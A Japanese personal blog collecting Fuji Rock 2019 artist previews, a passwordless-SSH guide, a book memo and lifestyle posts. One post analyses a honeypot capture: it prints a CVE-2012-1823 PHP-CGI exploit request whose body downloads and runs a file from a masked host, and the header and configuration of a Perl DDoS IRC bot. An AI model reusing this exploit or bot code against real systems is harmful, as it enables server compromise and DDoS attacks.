とりあえずブログ

普通のサラリーマンの雑多なブログ

【フジロック2019アーティスト紹介】THOM YORKE TOMORROW’S MODERN BOXES(トムヨーク トゥモローズ モダン ボクシーズ)

f:id:tkm03:20190422224002j:plain

(画像引用:ラインナップ|フジロックフェスティバル '19

レディオヘッドのボーカルのトムヨーク率いるTHOM YORKE TOMORROW’S MODERN BOXESのご紹介です。

フジロックの公式のアーティスト紹介ページにもあるようにサウンドだけでなく、ヴィジュアルも良さげなので、個人的にはすごい楽しみです。

THOM YORKE,NIGEL GODRICHとTARIK BARRI3名のアーティストで構成されるサウンドとヴィジュアルを融合した体感型プロジェクトTOMORROW’S MODERN BOXES。

A Brain In a Bottle

www.youtube.com

A Brain in a Bottleの入りは繰り返すボワボワしたシンセの音から始まり、癖になるドラムがそれに続きます。

その後、さらに不気味なシンセの音も重なりトムヨークのささやくようなボーカルが入ります。

なんとも不気味な感じの曲で、癖になります。

フジロックという大自然の中で、これを聴いて酒に酔いたい感じですね。

Guess Again!

www.youtube.com

ピアノ、ドラムス、ボーカルというシンプルな構成の曲です。

シンプルですが、心地よくもグルーヴが効いていて、やはり酔っ払いながら聴きたい曲となっています。

歌詞が奥深い。 germanpops.blog85.fc2.com

Suspirium

www.youtube.com

Suspiriumは2018年にリリースされた最新作です。

ここちよいピアノのアルペジオっぽい音色がメインの曲になっていますが、途中フルートのような笛っぽい音色も流れ、これも心地よいです。

どこか暗い感じの曲で、フジロックの夜に合いそうですね。

やっぱ歌詞が奥深い。 jellyhead.hateblo.jp

The Mother Lode

www.youtube.com

The Mother Lodeは上で紹介した曲と大きく違って、テンポが早いです。 キック音も割とはっきりしていて、ノリのよい曲に仕上がっています。 全体的にテクノっぽいですね。

Interference

www.youtube.com

Interferenceは、とても幻想的な曲ですね。

ライブ映像で見るとより幻想的ですね。

ぜひ生で見たいところです。

germanpops.blog85.fc2.com

まとめ

TOMORROW’S MODERN BOXESはしっぽりお酒を飲みながら、リラックスして聴きたいですね。

関連記事です。

saito.hatenadiary.com

CGI版PHPの脆弱性を狙ってDDoS攻撃のスクリプトを配置するアクセスをキャッチ

久しぶりに僕のハニーポットを見てみたら、面白いアクセスログがあったので紹介します。

そのアクセスはこちらにになります。

POST //cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1
Content-Length: 176
Content-Type: application/x-www-form-urlencoded
Host: -c

<? system("cd /tmp ; wget http://XXXXXX/unix ;  ; fetch http://XXXXXX/unix ;  ; perl unix ; rm -rf unix "); ?>

POSTリクエストの箇所がURLエンコードされているし、BODY部分を見てみると、思いっきりコマンドでunixファイルをダウンロードして、実行した後、削除しています。 怪しすぎます。。。

まずはURLエンコードされている箇所をデコードしてみます。

すると、こんな感じになります。

php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -d auto_prepend_file=php://input -n

これはPHP脆弱性(CVE-2012-1823)を狙った攻撃であることがわかります。

こちらの記事が詳しいので、詳細はこちらでご確認ください。 blog.tokumaru.org

次に怪しげなunixというファイルを確認してみます。 非常に長いので、冒頭の部分のみ紹介しておきます。

#!/usr/bin/perl
use Socket;
use IO::Socket;
use IO::Socket::INET;
use IO::Select;
#use strict;
use warnings;
 
######################################################################################################################
######################################################################################################################
##  DDoS Perl IrcBot v1.0 / 2016 modded by  phl4nk         ## [ Help ] #########################################
##      Stealth MultiFunctional IrcBot writen in Perl          #######################################################
##        Teste on every system with PERL instlled             ##  !u @system                                       ##
##                                                             ##  !u @version                                      ##
##     This is a free program used on your own risk.           ##  !u @channel                                      ##
##        Created for educational purpose only.                ##  !u @flood                                        ##
## I'm not responsible for the illegal use of this program.    ##  !u @utils                                        ##
######################################################################################################################
## [ Channel ] #################### [ Flood ] ################################## [ Utils ] ###########################
######################################################################################################################
##  !u @join <#channel>            ##  !u @udp1 <ip> <port> <time>              ##  !u @cback <ip> <port>             ##
##  !u @part <#channel>          ##  !u @udp2 <ip> <packet size> <time>       ##  !u @downlod <url+path> <file>     ##
##  !u !uejoin <#channel>        ##  !u @udp3 <ip> <port> <time>              ##  !u @portscan <ip>                 ##
##  !u !op <channel> <nick>      ##  !u @tcp <ip> <port> <packet size> <time> ##  !u @mail <subject> <sender>       ##
##  !u !deop <channel> <nick>    ##  !u @http <site> <time>                   ##           <recipient> <message>    ##
##  !u !voice <channel> <nick>   ##                                           ##  !u pwd;uname -a;id <for example>  ##
##  !u !devoice <channel> <nick> ##  !u @ctcpflood <nick>                     ##  !u @port <ip> <port>              ##
##  !u !nick <newnick>           ##  !u @msgflood <nick>                      ##  !u @dns <ip/host>                 ##
##  !u !msg <nick>               ##  !u @noticeflood <nick>                   ##                                    ##
##  !u !quit                     ##                                           ##                                    ##
##  !u !uaw                      ##                                           ##                                    ##
##  !u @die                      ##                                           ##                                    ##
##                               ##                                           ##                                    ##
######################################################################################################################
######################################################################################################################
 
#############################
##### [ Configuration ] #####
#############################
my @rps = ("/usr/local/apache/bin/httpd",
           "/usr/sbin/httpd -k start",
           "/usr/sbin/httpd",
           "/usr/sbin/sshd -i",
           "/usr/sbin/sshd",
           "/usr/sbin/sshd -D",
           "/usr/sbin/apache2 -k start",
           "/sbin/syslogd",
           "/sbin/klogd -c 1 -x -x",
           "/usr/sbin/acpid",
           "/usr/sbin/cron");

my $process = $rps[rand scalar @rps];
my @rversion = ("Phl4nk");
my $vers = $rversion[rand scalar @rversion];
my @rircname = ("zombie");
my $ircname = $rircname[rand scalar @rircname];
chop (my $realname = $rircname[rand scalar @rircname]);
my $nick =$rircname[rand scalar @rircname];
my $server = 'XXXXXX';
my $port = '6667';
my $linas_max='1';
my $sleep='5';
my $homedir = "/tmp";
my $version = 'v.02';
my @admins = ("local");
#my @hostauth = ("local");
my @channels = ("#dedibox");
my $pacotes = 1;

シェバンを確認すると、#!/usr/bin/perlとなっているので、perlスクリプトであることがわかります。 コメントを見ると、

This is a free program used on your own risk.
Created for educational purpose only.
I'm not responsible for the illegal use of this program.

これはあなたの責任においてフリーなプログラムです。 教育目的のためだけに作られました。 このプログラムの不法な使用に関して責任を負いません。

と記載があります。

また、

DDoS Perl IrcBot v1.0 / 2016

と記載されていることからDDoS用のスクリプトであることがわかります。

スクリプトを深く読み込んではいませんが、これを実行することで、どこかのサーバと通信を行い、なんらかの操作が実行されるようになるようです。

【フジロック2019アーティスト紹介】THE CHEMICAL BROTHERS(ケミカル・ブラザーズ)

そろそろ4月も後半に入り、フジロック2019まで3ヶ月を切ったということで、しっかりと予習していこうと思っているのですが、なかなか予習できていないっす。。。

そこで、僕の予習もかねて、このブログでフジロック2019に出演するアーティストを紹介できたらいいなーと思っています。

まず一発目は、

THE CHEMICAL BROTHERS

です。

f:id:tkm03:20190418174249p:plain (画像引用:ラインナップ|フジロックフェスティバル '19

もはや宣材写真が前衛すぎて、だれかわからん。笑 左がメガネをしているので、トム・ローランズさんで、右がエド・シモンズさんですね。

4/12に4年ぶりのアルバムを出した彼らですが、ひとまずApple Musicのトップソングから聴いていきます。 デジタル・ロックの王者 ケミカル・ブラザーズ、4年ぶり待望のニュー・アルバム『ノー・ジオグラフィー』発売! - ケミカル・ブラザーズ

Go

www.youtube.com

PVがシュールでいいですね。 曲自体はラップがなくても、ベースとドラムだけでノリノリな曲に仕上がっていますが、そこにQティップさんのラップが乗ることで、さらにファンクな曲に仕上がっています。

歌詞の中で繰り返されている

Oh, no time to rest Just do your best

(あぁ、休む時間なんてない、ベストを尽くせ)

は最高のフレーズです。

Got to Keep On

www.youtube.com

次は4月に発売されたばかりのアルバムからです。 なんともケミカルブラザーズらしい曲になっています。 ドラムとベース、そしてきれいなベルの音やコーラスが絶妙に入り混じって、独特のグルーヴを生み出しています。

Wide Open

www.youtube.com

Wide OpenのPVは一人の姿を変えながらダンスをするというシンプルなのですが、芸術的で個人的には非常に好きなPVです。

こちらがメイキング動画です。

めちゃくちゃ大変そう! www.youtube.com

曲の最初の入り方がドラムと柔らかいシンセの音から始まり、心地よい音色です。

とても癒される曲になっているので、ライブの真ん中らへんでブレイクダウンとしてやるのかなと想定しています。

Sometimes I Feel So Deserted

www.youtube.com

https://www.youtube.com/watch?v=saZVNLMMmmo

Sometimes I Feel So DesertedのPVはだいぶグロい動画になっています。。。 シンプルな音に女性の高いボーカルが入ることで、しまった曲になっています。

シンセの使い所も絶妙で聴いている側を飽きさせない曲となっています。

Hey Boy Hey Girl

www.youtube.com

ケミカルブラザーズと言えば、もうこの曲でしょう。 リリースされたのが1999年なのに、Apple Musicでもトップ5に入るなんて、もう名曲でしかないです。

歌詞はほぼ同じなのに、Here we goでサビに入るところは、何か弾ける感じがして、ぜひフジロックで聴いておきたい一曲です。

まとめ

僕が初めてケミカルブラザーズを知ったのは大学生のころで、こちらのPVを見て衝撃を受けました。

www.youtube.com

カセットテープを拾った二人が曲をかけると、勝手に体が動き出してしまい、その後ラジカセを持って街を歩くと他の人まで体が勝手に動いて、いろんなことをしてしまうというものなのですが、こんな感じでフジロックでも観客の体を勝手に動かす力を見せつけてほしいと思います。

パスワードなしでSSH接続する方法を図解する

これまでに何度となく、この方法でノンパスワードのSSH接続設定をやってきたか分からないのですが、毎回どっちでどっちの作業をやるんだっけってなるので、図解で整理しました。

初期状態

初期状態はSSHするサーバとSSHされるサーバが存在するだけです。

f:id:tkm03:20190416220730p:plain

SSHするサーバ側で鍵を作成

次にSSHするサーバ側で公開鍵と秘密鍵のペアを作成します。 もう作成されている場合はスキップです。

f:id:tkm03:20190416220919p:plain

コマンドはこんな感じ。 オプション「-t」で鍵タイプを指定します。 ここでは、rsaを指定しています。

ssh-keygen -t rsa

SSHするサーバ側で鍵ができる

すると、SSHするサーバ側で鍵が作成されます。 具体的には、~/.ssh配下にid_rsa秘密鍵)とid_rsa.pub(公開鍵)が作成されます。

f:id:tkm03:20190416221240p:plain

SSHされるサーバ側に公開鍵を転送

次にSSHされるサーバ側に公開鍵を転送します。 転送する方法はFTPでもSCPでも良いですが、要件に応じて転送方法を選びましょう。

f:id:tkm03:20190416221400p:plain

authorized_keysに公開鍵情報を書き込み

次にSSHされるサーバのSSHしたいユーザの~/.ssh/authorized_keysに公開鍵情報を書き込みます。

f:id:tkm03:20190416221454p:plain

コマンドはこんな感じ。

cat ~/id_rsa.pub >> authorized_keys

SSH接続確認

上記までできたら、SSH接続してみてパスワードなしでログインできることを確認します。

f:id:tkm03:20190416221719p:plain

いつも流れを忘れてしまうので、今回はわかりやすく概要だけ図解してみました。 うまくいかない方はファイルの権限周りを確認してみてください。

【読書メモ】ほぼ俺か俺でしょ『俺か、俺以外か。ローランドという生き方』

ローランドさんの『俺か、俺以外か』を読んだ。

僕がこの本を購入した理由は、最近ローランドという人物が気になっていたからです。

最近ネットサーフィンしていても何かしらローランドの情報が入ってきて、ローランドさんの思考が気になって、読んでみることにしました。

GoogleTrendsでローランドと検索してみると、2018年6月くらいからトレンドになっているようで、まさに今が旬という人物です。 (ローランドさんからすると、今が旬というより、ようやくローランドという男に世界が追いついてきたと言われそうですが。。。)

f:id:tkm03:20190411232338p:plain

この本について、結論からいえば、普段から自信がない僕とは真逆の価値観で、俺、俺、俺という感じでした。

何か世界のケイスケホンダに似たような良い意味で自己中心的な価値観、これは僕にまだまだ不足している力だと感じました。

10番をつけるチャンスが目の前にあって、違う番号を選びますかっていう話ですよ。僕はそのチャンスが目の前にあって、喜んで自分から要求しましたし、そのときに選ぶときにプレッシャーのことは何も考えなかったです。

本田圭佑 ACミラン 入団会見 - YouTube

こちらが絶対にボールを譲らないケイスケホンダさん。

www.youtube.com

女性の好きなタイプについて

僕がこの本で印象に残ったのは、ローランドさんの好きな女性のタイプについて記載されている箇所です。

僕もうれしいことに女性とお食事をしたり、合コンにさそわれたりすることがあります。

そのときによく聞かれるし、僕からも聞く質問。

「好きなタイプはどんな人?」

この質問に僕はいっつも適当に答えつつも、悩んでいました。

髪が長い人が好きなときもあるし、短髪な人がすきなときもあるし、おしとやかな人を好きになることもあれば、喜怒哀楽が激しい人を好きになることもあります。

つまり、タイプなんかないんです。

そんなとき、ローランドさんの言葉が胸に突き刺さりました。

「相手に求めることは、ただひとつ。俺のことを、心から魅了してほしい」そう答えている。容姿も収入も家柄も、別になんだっていい。とにかく俺を心から魅了してほしい。説明なんてできないぐらい、ハマらせてほしい。それだけだ。条件付きの好きは、本当の好きじゃない。説明できない好きが、本当の好きなのだ。

まさに本質。

僕が求めていた回答がそこにはありました。

僕を心から魅了できる女性。

当たり前のようだけど、簡単にはできないこと。

僕は今度から「どんな人がタイプですか?」と聞かれたら、「俺のことを心から魅了させてくれる女性」と答えることに決めました。

絶対キモいやつと思われるけど、本質をついている言葉なので、こう答えることに決めました。

過去を嘆く人は、努力が足りないひと

もう一つ僕が心に刺さったローランドさんの言葉を紹介しよう。

人が見ていないところで格好つけられない奴が、どうして人が見ているときに格好つけられるんですか?と。
人がみていないときこそ、格好つけるのだ。

常にカッコいい自分でいること。

これは非常に大切なことだと思います。

だらしない格好で魅力的な女性に会ったものなら、最悪です。

常に自分の最高の状態でいる。このマインドは心に刻みたいと思います。

まとめ

俺なんだ!そういう生き方をしてこなかった僕でしたが、この本を読んでマインドに少し変化がありました。

急には変わらないですが、徐々に俺か、俺以外かという精神が宿ってきています。

普段自分に自信がない方にはおすすめの一冊です。

俺か、俺以外か。 ローランドという生き方

俺か、俺以外か。 ローランドという生き方

女の子を連れ込みたいなら常に部屋を綺麗にしておけっていう話

f:id:tkm03:20190403225719j:plain

先日、女の子と食事をした際に、終電を逃しました。

酔っ払っていて記憶が曖昧ですが、居酒屋が僕の自宅からタクシーで帰れる距離だったので、僕の自宅で休むという話になりました。

でも、そこで僕は気づいてしまいました。

(待てよ。今俺の部屋めっちゃ荒れてるやん。。。)

ということで、自宅に連れ込むことなく、朝まで居酒屋で飲むという悲しいイベントがありました。

正直、自宅に一緒に帰って、イチャイチャしたかったー。。。

後悔しても仕方がないので、次のために絶対部屋は綺麗な状態にしておきたい!

どうやったら部屋を綺麗な状態にできるか

そもそもどうやったら部屋を綺麗な状態にキープできるか考えてみたいと思います。

まず部屋が汚くなる原因は、

  • 掃除してない
  • ものが多い
  • 収納するスペースがない
  • ものを出しっ放し

こんなところです。

掃除していない

僕は定期的に掃除するということはなく、部屋が汚いなーと思ったときだけ掃除するようにしています。

これがよくない!

定期的に掃除する機会を作り、少しずつ綺麗にしていった方がキープ力は高いです。

定期的にといっても、仕事から帰る時間も毎日違うし、その日ヘトヘトで帰宅することもありますので、まず掃除のハードルを下げることから始めたいと思います。 いきなり大規模な掃除から始めるのではなく、「毎日15分」「引き出しひとつ」「テーブルの上だけ」など小さい作業で毎日コツコツと掃除する考えに切り替え、綺麗な状態をキープしたいと思います。

あとどの掃除にどれくらいかかるのか、スプレッドシートに実績をまとめておき、スキマ時間に応じて、その掃除ができるように掃除のメニュー化を図りたいと思います。

f:id:tkm03:20190403222422p:plain

↑こんな感じ。 あと最後にやった日の列を追加すれば、前回掃除した日をみて、そろそろ床掃除やらなきゃとなるように作りました。

ものが多い

ものが多い件については、捨てるに限ると思います。

不要なものは山ほどあるので、まとめて捨てたいと思います。

「心に余裕がないからものが多い」と考え、徹底的に断捨離していきます!

収納するスペースがない

正確にいうと収納スペースはあるが、ちゃんと使いこなせてないが正解です。

僕の自宅の場合クローゼットはあるのですが、端っこの方の服は全く着ない服がかかっていたり、キッチンの棚に関しては、ものが整理整頓されずに収納されていないので、このあたりは必要不要を見極め、不要であれば捨て、必要なものは整理整頓して、収納しようと思います。

必要であれば、収納グッズの購入もしていきます。

山善(YAMAZEN) どこでも収納ボックス(3個セット) ブラック YTCF3P-(BK)

山善(YAMAZEN) どこでも収納ボックス(3個セット) ブラック YTCF3P-(BK)

コクヨ ブックエンド 中 黒 滑止め付 BS-33ND

コクヨ ブックエンド 中 黒 滑止め付 BS-33ND

ものを出しっ放し

これはもう「出したらしまう」を徹底するしかないのですが、これだと再発防止にはなりません。

上記の掃除していないとも関わってくるのですが、出しっ放しにしてしまう状況が気持ち悪い状況を作り出してしまえば、良いと思っています。

例えば、何も置いていないきれいなテーブルの上に、爪切りだけが置いてあれば気持ち悪いですよね。

こんな感じで徹底的に部屋を綺麗にすれば、出しっ放しの癖もなくなるはずです。 f:id:tkm03:20190403225828j:plain

まとめ

男たるもの、いつなんどき女性が自宅に来ても良いように部屋は綺麗な状態にしておくべしです。

インプット・アウトプットする時間が減ったのでカプセルホテルに泊まった話

最近インプット・アウトプットの時間が少ないなーと感じていたので、その原因と対策について語ります。

インプット・アウトプットが少ない原因

僕が思うに、インプット・アウトプットが少ない原因は自宅環境にあります。

それはPS4です。 f:id:tkm03:20190402223509p:plain

仕事から帰ってご飯を食べると、どうしてもPS4でゲームをしてしまいます。 ゲームをしているときは、特に考え事をせずにだらだらと過ごすことができて楽なのですが、なんとも生産的ではないです。 別にeスポーツのプロではないのに、ただひたすらゲームをしてしまいます。 あっという間に時間が過ぎ、いつの間にか寝る時間になってしまう。 そんな日々を繰り返ていました。

ゲームをストレス解消になれば、良いのですが実際そこまでストレスは解消されていないのが、現実です。

インプット・アウトプットを増やすための対策

そこで僕が講じた対策はPS4のない環境に身を置くという対策をとりました。 あえて、ゲームの無い環境で過ごして、そこでひたすら溜まりに溜まった本やブログの記事を書くことにしました。

僕が選んだ場所は最初は家の近くのホテルを探したのですが、結構値段的にも高かったこともあり、結局は荻窪の「安心お宿プレミア」というカプセルホテルをチョイスしました。

www.anshin-oyado.jp

なんと価格は1泊4,980円!しかも15:00にチェックインして、翌日の15:00まで滞在できる!

正直カプセルホテルに宿泊したことがなかった僕にとっては、どんなもんか不安でしたが、正直最高でした!

「安心お宿プレミア」の良いところ

「安心お宿プレミア」の良いところは、なんといっても作業スペースがあるところです。 寝る場所だけでなく、電源やWi-Fiがある作業スペースがあり、そこでパソコン作業することもできるし、読書することもできます。

f:id:tkm03:20190402223640j:plain

作業に疲れたら、同じ場所にあるマッサージチェアを使ってリラックスすることも可能です。 もちろんソフトドリンクは飲み放題です。

それに人工温泉があって、温泉に浸かって、ゆっくりすることもできます。 併設されているミストサウナも最高でした。

しかも朝食はカレーが食べ放題!僕はめちゃめちゃ食べました。

「安心お宿プレミア」に宿泊してみての結果

結果、溜まりに溜まった本も読むこともできましたし、パソコン作業もかなり捗りました。

5,000円でインプット・アウトプットの時間が確保できて、しかも温泉やミストサウナに入ることができる、素敵すぎる!

今後も定期的に通いたいと思います!